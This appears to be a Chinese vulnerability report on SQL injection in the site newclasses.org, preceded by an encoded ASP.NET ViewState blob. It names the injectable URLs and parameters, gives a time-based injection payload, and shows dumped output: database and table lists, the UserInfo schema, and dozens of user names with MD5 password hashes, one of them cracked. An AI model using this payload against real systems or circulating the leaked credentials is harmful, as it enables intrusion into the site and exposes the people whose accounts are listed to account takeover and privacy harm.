yR5oiY5p2vJnJkcXVvO%2bavlOi1m%2bS4re%2b8jOWkjeaXpuWkp%2bWtpuWcqDE5OTXlubTjgIExOTk55bm05ZKMMjAwMeW5tOS4ieasoeiOt%2bW%2bl%2baAu%2bWGoOWGm%2bOAgjIwMDLlubTvvIzlpI3ml6blpKflrablm6Llp5Tooqvor4TkuLrlhajlm70mbGRxdW875LqU5Zub57qi5peX5Zui5aeU5qCH5YW1JnJkcXVvO%2bOAguWtpueUn%2bivneWJp%2bWboue7j%2bW4uOWcqOagoeWbreS4iua8lOS4lueVjOWQjeWJp%2bWSjOiHque8luiHquWvvOiHqua8lOeahOaWsOaIj%2bOAguagoeeUt%2bWls%2baOkueQg%2bmYn%2bmDveaYr%2bWFqOWbveeUsue6p%2bmYn%2bOAguiJuuacr%2bS9k%2baTjeOAgeWwhOWHu%2baYr%2bWkjeaXpuWkp%2bWtpueahOS8oOe7n%2bS8mOengOS9k%2biCsumhueebru%2b8jOWcqOWFqOWbveWkp%2bWtpueUn%2bavlOi1m%2bS4reWxoeasoeWkuuWGoOOAguagoeWGheeOsOacieivneWJp%2bWbouOAgeS5pueUu%2bWNj%2bS8muetiTEwMOWkmuS4quWtpueUn%2bekvuWbou%2b8jOW5v%2bWkp%2bWtpueUn%2bWcqOesrOS6jOivvuWgguS4reaxsuWPluiQpeWFu%2b%2b8jOmUu%2beCvOaJjeW5suOAgjwvcD4NCjxwPuWkjeaXpuWKquWKm%2bS7peS4gOa1geeahOW4iOi1hO%2b8jOS4gOa1geeahOeuoeeQhu%2b8jOWfueWFu%2bWHuuS4gOa1geeahOWkjeaXpuS6uuaJjeOAguWkjeaXpuWfueWFu%2beahOS6uuaJje%2b8jOWcqOWQhOiHquWyl%2bS9jeS4iuWkp%2baYvui6q%2baJi%2b%2b8jOi1ouW%2bl%2bS6huekvuS8mueahOiCr%2bWumuWSjOeUqOS6uuWNleS9jeeahOaZrumBjeasoui%2fjuOAguacrOenkeavleS4mueUn%2be7neWkp%2bWkmuaVsOWcqDTmnIjlupXliY3og73okL3lrp7ljZXkvY3vvIzkupTjgIHlha3lrrbljZXkvY3kuonlpLrkuIDlkI3mr5XkuJrnlJ%2fnmoTnjrDosaHkuZ%2fkuI3kuY%2flhbbkvovjgILlnKjlhajlm73pq5jmoKHmr5XkuJrnlJ%2flsLHkuJrluILlnLrnq57kuonml6Xnm4rmv4Dng4jnmoTmg4XlhrXkuIvvvIzlpI3ml6bmnKznp5HnlJ%2flvZPlubTlsLHkuJrnjofov5HlubTmnaXlp4vnu4jlnKg5NSXku6XkuIrjgILku47mr5XkuJrnlJ%2fmtYHlkJHvvIzkuZ%2flj6%2fnnIvlh7rlpI3ml6bkurrlnKjnpL7kvJrlj5HlsZXkuK3miYDmi4XlvZPnmoTop5LoibLjgILov5vlhaXlm73lrrbmnLrlhbPnmoTkurrmlbDljaDmr5XkuJrmgLvkurrmlbDnmoQ2Je%2b9njcl77yM55u05Y2H5oiW6ICD5Y%2bW56CU56m255Sf77yM5Lul5Y%2bK55WZ5Zyo6auY5qCh5Y%2bK56eR56CU5Y2V5L2N55qE57qm5Y2gNDAl44CC6YeR6J6N5Y2V5L2N44CB5ZCE57G75YWs5Y%2b45LyB5Lia44CB5b6L5biI44CB5Lya6K6h5biI5LqL5Yqh5omA562J5q%2bU5L6L5Z2H6L6D6auY44CC55So5Lq65Y2V5L2N5pmu6YGN5Y%2bN5pig77yM5aSN5pem55qE5a2m55Sf5aSn5aSa5pWw5YW35aSH6Ieq5L%2bh5b%2bD5by644CB5pyJ5Y2P5L2c57K%2b56We44CB6YCC5bqU6IO95Yqb5by6562J6K%2b45aSa5LyY54K577yM5Zyo5bel5L2c5Lit5b6A5b6A6IO96ISx6aKW6ICM5Ye644CCPC9wPg0KPHA%2b5aSN5pem5aSn5a2m56eR5oqA5bel5L2c5Lul6Z2i5ZCR5Zu96ZmF56eR5a2m5YmN5rK%2f44CB6Z2i5ZCR5Zu95a625oiY55Wl6ZyA5rGC44CB6Z2i5ZCR5Zyw5pa55LiO5Zu95rCR57uP5rWO5Li75oiY5Zy65Li65oyH6ZKI77yM5Lul5byA5bGV5Y6f5aeL5oCn56eR5a2m5Yib5paw56CU56m244CB5Ye65LiA5rWB56eR5oqA5Lq65omN5LiO56eR5oqA5oiQ5p6c44CB5pyN5Yqh5LqO5Zu95a625a6J5YWo5LiO5Zyw5pa55Y%2bR5bGV5Li655uu5qCH77yM5Lul5om%2f5ouF5Zu95a625LiO5Zyw5pa56YeN5aSn56eR5oqA6aG555uu44CB5bu66K6%2b6YeN5aSn56eR5a2m5bmz5Y%2bw44CB5Z%2b56IKy5LyY56eA5Yib5paw5Zui6Zif5Li65oqT5omL44CC5L2c5Li66aaW5bit56eR5a2m5a625Y2V5L2N77yM55uu5YmN5om%2f5ouF5Zu95a626YeN54K55Z%2b656GA56CU56m25Y%2bR5bGV6KeE5YiS6aG555uu77yIOTcz6aG555uu77yJNumhue%2b8jDIwMDItMjAwM%2bW5tOiOt%2baJueWHhuWbveWutuiHqueEtuenkeWtpuWfuumHkemHjeWkp%2bS4jumHjeeCuemhueebrjE16aG577yM5LiK5rW35biC6YeN5aSn5LiO6YeN54K56aG555uuMjfpobnjgILmnInlm73lrrboh6rnhLbnp5Hlrabln7rph5Hlp5TkvJjnp4DliJvmlrDnoJTnqbbnvqTkvZMz5Liq77yM5LiK5rW35biC5LyY56eA56eR5oqA5Yib5paw576k5L2TMeS4quOAgui%2fkTXlubTlrabmoKHojrflvpflm73lrrbnuqfnp5HmioDmiJDmnpzlpZblirE26aG577yM5YW25Lit77yMJmxkcXVvO%2bibi%2beZvea%2fgOmFtuWcqOmYv%2beJh%2beJqei0qOS7i%2bWvvOeahOS%2foeWPt%2bi9rOWvvOWSjOiAkOWPl%2baIkOeYvuS4reeahOS9nOeUqCZyZHF1bzvjgIEmbGRxdW8756We57uP572R57uc55qE6Z2e57q%2f5oCn5pig54Wn55CG6K6677yM5L%2bh5Y%2b355uy5YiG56a75ZKM5Li75oiQ5Lu977yI5b6u5bCP5oiQ5Lu977yJ5YiG5p6QJnJkcXVvO%2bS7peWPiiZsZHF1bzvnoYXln7rkvY7nu7Tnu5PmnoTmnZDmlpnnmoTnoJTliLbnianmgKfnoJTnqbblj4rmlrDlnovlmajku7bliLblpIcmcmRxdW875LiJ6aG556eR56CU5oiQ5p6c5ZCM5pe26I2j6I63MjAwMuW5tOW6puWbveWutuiHqueEtuenkeWtpuWlluS6jOetieWllu%2b8jOWxheWFqOWbvemrmOagoeS5i%2bmmluOAguecgemDqOe6p%2benkeaKgOaIkOaenOWlluWKsTIxNOmhue%2b8jOiOt%2bW%2bl%2baOiOadg%2bS4k%2bWIqTI0Memhue%2b8jOWcqOWbvemZheS4iuWPkeihqOiuuuaWhzM2OTbnr4fjgILlnKjov5HkuInlubTjgIpTY2llbmNl44CL44CB44CKTmF0dXJl44CL562J5Zu96ZmF6aG257qn5pyf5YiK5Y%2bR6KGo6K665paH5pWwNeevh%2b%2b8jOWPluW%2bl%2bmHjeWkp%2beahOeqgeegtOOAgui%2fkeWHoOW5tO%2b8jOWtpuagoemdouWQkeWbveawkee7j%2ba1juS4u%2baImOWcuu%2b8jOWcqOS4k%2beUqOmbhuaIkOeUtei3r%2bOAgeiuoeeul%2bacuue9kee7nOW3peeoi%2bOAgeeUn%2beJqeaKgOacr%2bOAgeacieacuue6s%2bexs%2badkOaWmeWSjOWCrOWMluWJgueglOeptuetieaWuemdouW8gOWPkeS6huS4gOezu%2bWIl%2benkeaKgOaIkOaenO%2b8jOS6p%2beUn%2bS6huaYvuiRl%2beahOekvuS8muS4jue7j%2ba1juaViOebiuOAguWcqOmdnue6v%2baAp%2baVsOWtpuOAgeWFiOi%2fm%2badkOaWmeOAgeS6uuexu%2bWfuuWboOe7hOWtpuOAgeWfuuehgOWMu%2bWtpuS4juS4tOW6iuWMu%2bWtpuetiemihuWfn%2bWPluW%2bl%2bS6humHjeimgeeahOenkeaKgOi%2fm%2bWxleOAgjwvcD4NCjxwPuS6uuaWh%2benkeWtpuWSjOekvuS8muenkeWtpueglOeptuaWuemdou%2b8jOWcqOWOhuWxiuS4iua1t%2bW4guWTsuWtpuekvuS8muenkeWtpuS8mOengOaIkOaenOivhOmAieS4re%2b8jOWkjeaXpueahOiOt%2bWlluetiee6p%2bWSjOaAu%2baVsOmDveS7pee7neWvueS8mOWKv%2bmihuWFiO%2b8jOWFtuS4reOAiuS4reWbveWOhuWPsuWcsOWbvumbhuOAi%2bOAgeOAiuiLseaxieWkp%2bivjeWFuOOAi%2bOAgeOAiuS4reWbveaWh%2bWtpuaJueivhOmAmuWPsuOAi%2biOt%2beJueetieWllu%2b8m%2baciTXpobnmiJDmnpzojrcyMDAw5bm06aaW5bGK5YWo5Zu95ZOy5a2m56S%2b5Lya56eR5a2m5Z%2b66YeR6KeE5YiS6aG555uu5LyY56eA5oiQ5p6c5aWW77yM5YW25Lit55Sx6ZmG6LC35a2Z5pWZ5o6I5Li757yW55qE44CK6Iux5rGJ5aSn6K%2bN5YW444CL6I635LiA562J5aWW77yM5piv5LiK5rW35Zyw5Yy65ZSv5LiA55qE5LiA562J5aWW6I635b6X6ICF44CC5aSN5pem6L%2bY5aSa5qyh6I635b6X5Lit5Zu95Zu%2b5Lmm5LiA562J5aWW44CBJmxkcXVvO%2bS6lOS4quS4gOW3peeoiyZyZHF1bzvkvJjnp4Dlm77kuablpZbjgIHkuIrmtbfluILkvJjnp4Dlm77kuabnibnnrYnlpZbnrYnlpZbpobnjgIIyMDAy5bm05om%2f5ouF5Zu95a6256S%2b5Lya56eR5a2m5Z%2b66YeR6aG555uuMzHpobnvvIzliJflhajlm73pq5jmoKHnrKzkuozkvY3vvIzojrflm73lrrbnpL7kvJrnp5HlrablpZYyMumhueOAgjwvcD4NCjxwPuWkjeaXpuWkp%2bWtpui%2fmOenr%2baegeWFtOWKnuenkeaKgOS6p%2bS4mu%2b8jOaOqOWKqOS6p%2bOAgeWtpuOAgeeglOiBlOWQiOS9k%2b%2b8jOS%2fg%2bi%2fm%2benkeaKgOaIkOaenOi9rOWMluS4uueUn%2bS6p%2bWKm%2bOAgumAmui%2fh%2baOoue0ouWSjOWunui3te%2b8jOWQuOWPluS6huWbveWGheWkluacieebiueahOe7j%2bmqjO%2b8jOWunuaWveWkmuenjeaooeW8j%2bWPkeWxleenkeaKgOS6p%2bS4mu%2b8jOS9v%2bWtpuagoeenkeaKgOaIkOaenOi9rOWMluWPiuS6p%2bS4muWMluW3peS9nOW%2bl%2bWIsOS6huW%2biOWkp%2beahOWPkeWxle%2b8jOW5tuS4lOaJk%2bmAoOWHuuS6hiZsZHF1bzvlpI3ml6YmcmRxdW8755Sf5py65YuD5YuD55qE5qCh5Yqe5Lqn5Lia576k77yM5Lmf5byA6L6f5Ye65LiA5p2h5YW35pyJJmxkcXVvO%2bWkjeaXpueJueiJsiZyZHF1bzvnmoTkuqfkuJrljJbkuYvot6%2fjgILnjrDmnInkuIrluILlhazlj7gz5a6277yM5YW25Lit6aaZ5riv5Yib5Lia5p2%2f5LiK5biC5YWs5Y%2b4MuWutu%2b8jOWmguS4iua1t%2bWkjeaXpuW%2brueUteWtkOiCoeS7veaciemZkOWFrOWPuO%2b8jOaYr%2bWbveWGhemmluWutuS4k%2bmXqOS7juS6i%2bi2heWkp%2binhOaooembhuaIkOeUtei3r%2biuvuiuoeOAgeW8gOWPkeOAgeeUn%2bS6p%2bOAgemUgOWUrueahOWPkei1t%2bW8j%2biCoeS7veaciemZkOWFrOWPuO%2b8jOWug%2baYr%2bWcqOmmmea4r%2bS4iuW4gueahOesrOS4gOS4quWkjeaXpuWkp%2bWtpuWTgeeJjOeahOmrmOenkeaKgOS8geS4mu%2b8jOWcqCZsZHF1bzvkuprmtLLph5Hono0mcmRxdW875p2C5b%2bX6K%2bE5Ye655qEMjAwMeW5tOW6puS4reWbveWkp%2bmZhuWcsOWMuuacgOS9s%2bS8geS4muaOkuihjOamnOS4iu%2b8jOivpeWFrOWPuOWIl%2bS4uuesrOWNgeS9jeOAgjwvcD4NCjxwPuWtpuagoeebruWJjeWNoOWcsOmdouenrzI2MOWkmuS4h%2bW5s%2baWueexs%2b%2b8jOagoeiIjeW7uuetkemdouenrzExMOWkmuS4h%2bW5s%2baWueexs%2b%2b8jOWFqOagoeWbuuWumui1hOS6pzE55Lq%2f5YWD44CC5a2m5qCh546w5pyJ5ZCE57G75a6e6aqM5a6kMTMw5aSa5Liq77yM5YW25Lit5pyJNeS4quWbveWutumHjeeCueWunumqjOWupO%2b8jDEw5Liq5pWZ6IKy6YOo6YeN54K55a6e6aqM5a6k77yMNuS4quWNq%2beUn%2bmDqOmHjeeCueWunumqjOWupO%2b8m%2baLpeacieaWh%2beQhuWMuzPkuKrlm77kuabppobvvIzlhajmoKHnjrDmnInol4%2fkuaY0MzPkuIflhozvvIzmnJ%2fliIrmgLvmlbDotoXov4cyLjXkuIfnp43vvIzlnYflsYXlhajlm73pq5jmoKHliY3liJfjgILov5HlubTmnaXvvIzlrabmoKHkuLrov47mjqXnmb7lubTmoKHluobvvIzmoKHlm63ln7rmnKzlu7rorr7lhajpnaLpk7rlvIDvvIzmsZ%2fmub7mlrDmoKHljLoxNTAw5Lqp5Zyf5Zyw5bey5Yqo5bel5YW05bu677yM6aKE6K6h5LiA5pyf5bel56iL5Zyo55m%2b5bm05qCh5bqG5YmN5a6M5oiQ77yM6YKv6YO45qCh5Yy655qE5YWJ5Y2O5qW844CB5p6r5p6X5qCh5Yy656eR56CU5qW85ZKM5q2j5aSn5L2T6IKy6aaG5Lmf5bCG5LqO55m%2b5bm05qCh5bqG5YmN56uj5bel77yM5byg5rGf5Zut5Yy65ZKM5paw6Ze75a2m6Zmi5Zut5Yy655qE5bu66K6%2b6L%2bb5bGV6aG65Yip44CCPC9wPg0KPHA%2b5aSN5pem5aSn5a2m5bey5oiQ5Li65Zu96ZmF5LiK5pyJ5b2x5ZON55qE5a2m5pyv5Lit5b%2bD5LmL5LiA77yM5YW35pyJ5bm%2f5rOb57Sn5a%2bG55qE5Zu96ZmF6IGU57O777yM5a2m5pyv5Lqk5rWB5rS75Yqo6Z2e5bi45rS76LeD77yM5bey5LiO6L%2bRMzDkuKrlm73lrrblkozlnLDljLrnmoQyMDDlpJrmiYDpq5jmoKHlkoznoJTnqbbmnLrmnoTlu7rnq4vkuoblkIjkvZzkuqTmtYHlhbPns7vvvIzlubblkJEzMDDlpJrkvY3lm73pmYXnn6XlkI3lrabogIXlkozkurrlo6vmjojkuojkuoblkI3oqonljZrlo6vjgIHlkI3oqonmlZnmjojjgIHpob7pl67mlZnmjojnrYnnp7Dlj7fjgILnvo7lm73liY3mgLvnu5%2fph4zmoLnjgIHms5Xlm73liY3mgLvnu5%2flvrfmlq%2flnabjgIHojbflhbDliY3pppbnm7jlkJXotJ3lsJTmlq%2fjgIHku6XoibLliJfliY3mgLvnkIbmi4nlrr7nrYnlpJblm73lhYPpppbmiJbmlL%2flupzpppbohJHvvIzlnKjogYzmnJ%2fpl7Tmm77liLDlpI3ml6borr%2fpl67lubblj5HooajmvJTorrLjgILlpI3ml6blpKflrabnp6%2fmnoHlj4LkuI7lkITnsbvph43opoHlm73pmYXlpKflrabnu4Tnu4fvvIznu6cxOTk45bm05oiQ5Yqf5Li%2b5Yqe5LqG5Lic5Lqa56CU56m25Z6L5aSn5a2m5bm05Lya5LmL5ZCO77yMMjAwMOW5tOaIkOWKn%2bS4vuWKnjIx5LiW57qq5aSn5a2m5qCh6ZW%2f5Y2P5Lya56ysNOasoeW5tOS8mu%2b8jDIwMDHlubTlj4jmiJDlip%2fkuL7lip7kuoYmbGRxdW87546v5aSq5bmz5rSL5aSn5a2m5Y2P5LyaJnJkcXVvO%2besrOS6lOasoeW5tOS8muOAgumaj%2bedgOWkjeaXpuWcqOWbvemZheS4iuWcsOS9jeeahOaPkOWNh%2b%2b8jOacieebuOW9k%2bmDqOWIhueahOWtpuacr%2bS8muiuruWcqOWkjeaXpuS4u%2bWKnu%2b8jOS7hTIwMDLlubTlrabmoKHlsLHkuLvlip7kuoblm73pmYXmlbDlrabogZTnm5%2fmiaflp5TkvJrkvJrorq7jgIHlm73pmYXlkIjmiJDph5HlsZ7kvJrorq7lkoznrKzkuIPlsYrkuJbnlYzlr7nlpJbmsYnor63mlZnlrabkvJrorq7nrYnpq5jop4TmoLzjgIHlpKfop4TmqKHnmoTlm73pmYXlrabmnK%2fkvJrorq7jgILov5Hlh6DlubTvvIzlpI3ml6blpKflrabnp6%2fmnoHmjqjov5vlm73pmYXljJbov5vnqIvvvIzkuI7nvo7lm73ogLbpsoHlpKflrabjgIHml6XmnKzml6nnqLvnlLDlpKflrabjgIHmlrDliqDlnaHlm73nq4vlpKflrabnrYnkuJbnlYzokZflkI3lpKflrablu7rnq4vkuobmiJjnlaXlkIjkvZzkvJnkvLTlhbPns7vjgILlpI3ml6bmoKHokaPkvJrng63lv4PlrabmoKHlt6XkvZzvvIzlrabmoKHmr4%2flubTpg73lvpfliLDmoKHokaPnmoTlpKflipvotYTliqnjgII8L3A%2bDQo8cD7ml6XmnIjlhYnljY7vvIzml6blpI3ml6blha7jgILlnKjlm73lrrbmlZnogrLpg6jlkozkuIrmtbfluILmlL%2flupznmoTph43ngrnmipXotYTkuIvvvIzlpI3ml6bov5nmiYDnmb7lubTlkI3moKHmraPlipvkuonlu7rorr7miJDkuLrkuIDmiYDnq4votrPkuIrmtbfjgIHmnI3liqHlhajlm73jgIHlm73pmYXkuIDmtYHnmoTpq5jmsLTlubPjgIHnoJTnqbblnovnmoTkuJbnlYzkuIDmtYHnu7zlkIjmgKflpKflrabvvIzkuLrkurrnsbvmlofmmI7ov5vmraXvvIzkuI3mlq3mjqLntKLmlZnogrLjgIHnp5HmioDliJvmlrDlkozliLbluqbliJvmlrDmiJDmnpzjgII8L3A%2bDQo8cD48L3A%2bZAICDw8WAh8CaGRkAgMPDxYCHgRUZXh0BQzlpI3ml6blpKflraZkZAIFDxYCHwMF2QIgPGltZyBzcmM9J2h0dHA6Ly93d3cubmV3Y2xhc3Nlcy5vcmcvdXBsb2FkL3p5dFwyMDEyMTJcNjM0OTA0OTY3MTExODgwMDAwLmpwZycgaGVpZ2h0PScxMjgnIHdpZHRoPScyMDAnLz4gPGltZyBzcmM9J2h0dHA6Ly93d3cubmV3Y2xhc3Nlcy5vcmcvdXBsb2FkL3p5dFwyMDEyMTJcNjM0OTA0OTY3MTcxOTUwMDAwLmpwZycgaGVpZ2h0PScxMjgnIHdpZHRoPScyMDAnc3R5bGU9J21hcmdpbjogMCAxOHB4IDAgMThweDsnLz4gPGltZyBzcmM9J2h0dHA6Ly93d3cubmV3Y2xhc3Nlcy5vcmcvdXBsb2FkL3p5dFwyMDEyMTJcNjM0OTA0OTY3MjE2MzYwMDAwLmpwZycgaGVpZ2h0PScxMjgnIHdpZHRoPScyMDAnLz5kGAIFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQ5jdGwwMCRpYnRMb2dpbgUjY3RsMDAkQ29udGVudFBsYWNlSG9sZGVyMSRGb3JtVmlldzEPFCsAB2RkZGRkFgACAWT7s3XYxk9saysi7pudjbN9yjtogg%3d%3d


http://www.newclasses.org/Active/2015zyt/page/schoolDetail.aspx?schoolid=1
http://www.newclasses.org/Active/2015zyt/page/schoolSearch.aspx?is211985=&page=8&SchoolName=&score1=1&score2=1&select=&show=1
(参数score1,score2,select都是注射点)
http://www.newclasses.org/zznh/page/info02.aspx?Esayid=207


贴出注射代码及数据:

Payload: http://www.newclasses.org:80/2013ZYT/school_detail.aspx?schoolid=1'; WAITFOR DELAY '0:0:2'--


available databases [31]:
[*] Active
[*] Ask
[*] askgong
[*] AskNew
[*] BookSell
[*] ConvergenceDB
[*] DataAnlysis
[*] Eastern
[*] EnglishMatch
[*] FtzDB
[*] GKSite
[*] master
[*] MathematicsDB
[*] misDB
[*] model
[*] msdb
[*] NetWork
[*] NewClasses
[*] ReportServer
[*] ReportServerTempDB
[*] studyDB
[*] studyDBNew
[*] tempdb
[*] TestOnLine
[*] userlogDB
[*] userlogDBNew
[*] wishDB
[*] WishDBBak
[*] YwbDB
[*] ZKSite
[*] zw


获取当前数据库名称,current-db,而且是个普通用户,无法直接getshell!
得到当前数据库下庞大的表名。
current database: 'NewClasses'

Database: NewClasses
[190 tables]
+--------------------------+
| Achievements             |
| Blessing                 |
| CheckMob                 |
| ClassClass               |
| ClassCondition           |
| ClassCourse              |
| ClassCourseType          |
| ClassHead                |
| ClassLecture             |
| ClassSeateTimeTable      |
| ClassStudent             |
| ClassStudentLog          |
| ClassTableSpan           |
| ClassTeacher             |
| ClassTimeSpan            |
| ClassTimeTales           |
| ClassTimeType            |
| ClassTimetable           |
| CountSSP                 |
| Counts                   |
| Course_FeedBack          |
| D99_CMD                  |
| D99_REG                  |
| D99_Tmp                  |
| FiveYear                 |
| GradeTemp                |
| Infos                    |
| MS_FeedBack              |
| MarketSource             |
| MesInfo                  |
| MesInfoType              |
| MesMterrcodeError        |
| MesMtstatError           |
| NATIONALMAP              |
| NewUserSoureNo           |
| OfflineCampus            |
| OfflineClass             |
| OfflineClassBak          |
| OfflineCourse            |
| OfflineCourseBak         |
| OfflineCourseType        |
| OfflineCourseTypeBak     |
| OfflineLecture           |
| OrderCourse              |
| OrderCourseBak           |
| OrderCourseBak_20130708  |
| OrderHead                |
| OrderMoney               |
| OrderRevenueType         |
| ParaCityV2               |
| ParaDistrict             |
| ParaDistrictV2           |
| ParaProvince             |
| ParaProvinceV2           |
| ParaRegion               |
| ParaStreetV2             |
| RecArea                  |
| RecChannel               |
| RecommendUser            |
| Reservation              |
| ReservationType          |
| Satisfaction             |
| School                   |
| SelfEnrollment           |
| SpecialTest              |
| SspUserinfo              |
| Suggest                  |
| TeacherEvaluation        |
| TestUpLoad               |
| TimeType                 |
| UpLoad                   |
| UpLoadSource             |
| UpLoadType1              |
| UpLoadType2              |
| UserActivation           |
| UserCard                 |
| UserFavInfo              |
| UserInfo                 |
| UserInfoSsp              |
| UserInfoSubject          |
| UserInfo_bk2012          |
| UserInfo_bk2013          |
| UserParentInfo           |
| UserSource               |
| UserSourceNo             |
| V2M_CourseLectures       |
| V2M_CourseMatching       |
| V2M_CourseWare           |
| V2M_ExpTemp              |
| V2M_HighSchool           |
| V2M_HighSchoolScore      |
| V2M_InfoHeadline         |
| V2M_InfoReferrals        |
| V2M_Information          |
| V2M_OvertLecture         |
| V2M_OvertLecture2        |
| V2M_Search               |
| V2M_StudentExp           |
| V2M_UrlRewriter          |
| V2P_AD                   |
| V2P_AdRelationship       |
| V2P_CourseClass          |
| V2P_CourseGrade          |
| V2P_CourseSubject        |
| V2P_CourseType           |
| V2P_HighSchoolPic        |
| V2P_HighSchoolType       |
| V2P_InfoBigClass         |
| V2P_InfoSmallClass       |
| V2P_Keyword              |
| VC_TO_MS                 |
| VW_SysUserInfo           |
| YXX_FeedBackQuestion     |
| YXX_MyScore              |
| YXX_StudentFile          |
| Yxx_AccessReply          |
| Yxx_Anouncement          |
| Yxx_ClickInfo            |
| Yxx_ComBuildUp           |
| Yxx_ExcellentNoteShare   |
| Yxx_ExpFaceExp           |
| Yxx_ExpFileShareComment  |
| Yxx_LatestPolicy         |
| Yxx_LittleSurvey         |
| Yxx_Mails                |
| Yxx_NewCoin              |
| Yxx_NewCoin_Bak          |
| Yxx_Recommend            |
| Yxx_ScoreLevel           |
| Yxx_Stu_Listening        |
| Yxx_StudyFriends         |
| Yxx_Teacher              |
| Yxx_TeacherInClass       |
| Yxx_TeacherType          |
| Yxx_UrlReferrer          |
| Yxx_UserActionLog        |
| Yxx_VC_Anouncement       |
| Yxx_VC_ClassMessge       |
| Yxx_VC_Classes           |
| Yxx_VC_FacePostionType   |
| Yxx_VC_MessageToTeachers |
| Yxx_VC_StudentInClasses  |
| Yxx_V_Note               |
| Yxx_V_NoteParameter      |
| Yxx_V_NoteType           |
| Yxx_WKClick              |
| Yxx_WebClassAccess       |
| Yxx_YourMBTI             |
| _20140103OfflineCourse   |
| _School20130125          |
| figure                   |
| gszz                     |
| iplist                   |
| mzKnowledgeId            |
| mzPosts                  |
| mzQuestionId             |
| mzQuestionTraining       |
| mzTeaMessage             |
| mzTeacher                |
| mzTeacherEvaluation      |
| projectTemplate          |
| projectTemplateConent    |
| projectTemplateCourses   |
| redpackte                |
| stuRecomAchievements     |
| stuRecomContestants      |
| stuRecomCourse           |
| stuRecomSellOneself      |
| stuRecomType             |
| studentspositions        |
| sysdiagrams              |
| tblInfosDownload         |
| tblXJ2012                |
| v2m_LearningContent      |
| v2p_LearningType         |
| v2p_LearningType_Small   |
| ztDig                    |
| ztOrder                  |
| ztOrderCouse             |
| ztOrderMoney             |
| zzCourseComment          |
| zzCourseType             |
| zzCouserWareDetails      |
| zzMajorLecture           |
| zzOrder                  |
| zzOrderCouse             |
| zzOrderMoney             |
| zzRefund                 |
| zzUserSource             |
| zz_sh_enroll             |
+--------------------------+


Database: NewClasses
Table: UserInfo
[52 columns]
+-------------------+------------------+
| Column            | Type             |
+-------------------+------------------+
| addAdminTime      | smalldatetime    |
| AddBy             | varchar          |
| AddedTime         | datetime         |
| Address           | nvarchar         |
| Avatar            | varchar          |
| Birthday          | varchar          |
| BMlevel           | int              |
| DeleteBy          | varchar          |
| DeleteTime        | datetime         |
| DistrictId        | uniqueidentifier |
| EducationLevel    | varchar          |
| Email             | varchar          |
| ErrorAddress      | bit              |
| Grade             | varchar          |
| Id                | int              |
| IsClear           | bit              |
| IsDelete          | bit              |
| IsJoinRecruitment | varchar          |
| isListForCF       | bit              |
| IsModify          | bit              |
| IsOnLine          | int              |
| LastLoginIp       | varchar          |
| LastLoginTime     | datetime         |
| LockType          | int              |
| MobilePhone       | varchar          |
| ModifyBy          | varchar          |
| ModifyTime        | datetime         |
| MSN               | varchar          |
| nowAdmin          | varchar          |
| otherCourse       | varchar          |
| otherTel          | nvarchar         |
| PassWord          | varchar          |
| PostCode          | varchar          |
| ProvinceId        | uniqueidentifier |
| pwd               | varchar          |
| QQ                | varchar          |
| RegIP             | varchar          |
| RegSourceID       | nvarchar         |
| RegSourceIn       | nvarchar         |
| RegSourcePage     | nvarchar         |
| RegTime           | datetime         |
| remark            | nvarchar         |
| SchoolId          | uniqueidentifier |
| Sex               | nchar            |
| Status            | int              |
| StudentId         | uniqueidentifier |
| studentno         | varchar          |
| Tel               | varchar          |
| UserId            | varchar          |
| UserName          | nvarchar         |
| UserSourceId      | uniqueidentifier |
| UserType          | char             |
+-------------------+------------------+


Database: NewClasses
Table: UserInfo
[9715 entries]
+------------+---------------------------------------------------------------------+
| UserName   | PassWord                                                            |
+------------+---------------------------------------------------------------------+
| 邬出现        | 243a1e2ad0be110e568c223b3a5bcddc                                    |
| 袁受种        | 243c5bbdb03fe04977844168519b0cbc                                    |
| 汤烈以        | 2440baeef821ab23a20eede8df29653a                                    |
| 窦量的        | 24410185a0183628661fe5d5c0b2be3e                                    |
| 李惠         | 2441d30af50c96ebc6823358c64b0780                                    |
| 谢蒙         | 2442152c33b29fc63d06f377eff8f53f                                    |
| 吕昕雨        | 244265ecf4a687833364e80f167c1107                                    |
| 戴安         | 2442fbb8772133e6c374a2bae71fccd2                                    |
| 黄慧淋        | 24433223389015f8ce4e1bbb81c268a8                                    |
| 方遥         | 2444cec55baff844cc6176f54c9f5ace                                    |
| 马之梅        | 244590e2aaffd3baff044cf8ab0a7f4e                                    |
| 项舒艺        | 2446a9ed5b002b908b3ce7bf9449c2bf                                    |
| 王惊涛        | 24483baa74a690731a3c78d614422e58                                    |
| 贺副一        | 244b216e2d3687cc20e5fa71d6622d69                                    |
| 张一         | 244b4588bf750985dd2b8a1a4a498327                                    |
| 计唯一        | 244b94622d0cd532e63480de7dc6452d                                    |
| 宋世怡        | 244c1619ed6a0af4f613d0554c061680                                    |
| 屈的才        | 244c78bc05f76e8a201b1d6c807f5ec8                                    |
| 周珍爱        | 244d79ad5209bd1d4a41473b60ca6df4                                    |
| 危中进        | 244ed75d68b5726d565645746d129af3                                    |
| 冯允         | 244ff3f782ac05dd2f7a50f223d3d46a                                    |
| 狄造要        | 2450bc65341777d4ab972b4e3d27c5e4                                    |
| 章帮衡        | 245192427cab1925e0f86470c9691c8e                                    |
| 谢的衷        | 2451dec19aee26cd6f07c0ede8f8dcdb                                    |
| 张晓卉        | 245285b796ce213e8196d0768760c334 (980313)                           |
| 刘予舟        | 2452def5bc2d39c53714784c4c024f22                                    |
| 贺方情        | 245521b1501aa90943535c056af256e9                                    |
| 花世法        | 24552d4364ebe16ff7323c16172638b4                                    |
| 翟丽辉        | 24553c8c90667548547678353c75c61c                                    |
| 杨高为        | 245543ee64d9424e0298c6e43deaeb65                                    |
| 黄晟婷        | 24557862227f8a8060cebb5d7dc23da5                                    |
| 周话家        | 2455b2c45566cf612c994aba376ccb91                                    |
| 朱丽瑜        | 2456aa80e94b616ab84948d79a26c597                                    |
| 于秘社        | 245703c9040d73df964a8c02ae5cfd40                                    |
| 张欢玲        | 2457d5c4f6dba8601ba5c92d0a8a41ee                                    |
| 宫照飞        | 245a8af1ca3b273fc9a8500a302d7ab1                                    |
| 励好         | 245ac6afc6ba3ad356552a3dbf1ead18                                    |
| 安屉隐        | 245aec9fac67213220b403b6a4cc3cc1                                    |
| 戴炼敏        | 245b82d147bd0db54a7b032b5b719ada                                    |
| 齐好在        | 245ce100b6dafe2010b1a8842953052f                                    |
| 朱钰         | 245e45cb40611083434a2c4f2edcab2d                                    |
| 萧一者        | 245f29b044d72f259d36d99537436f27                                    |
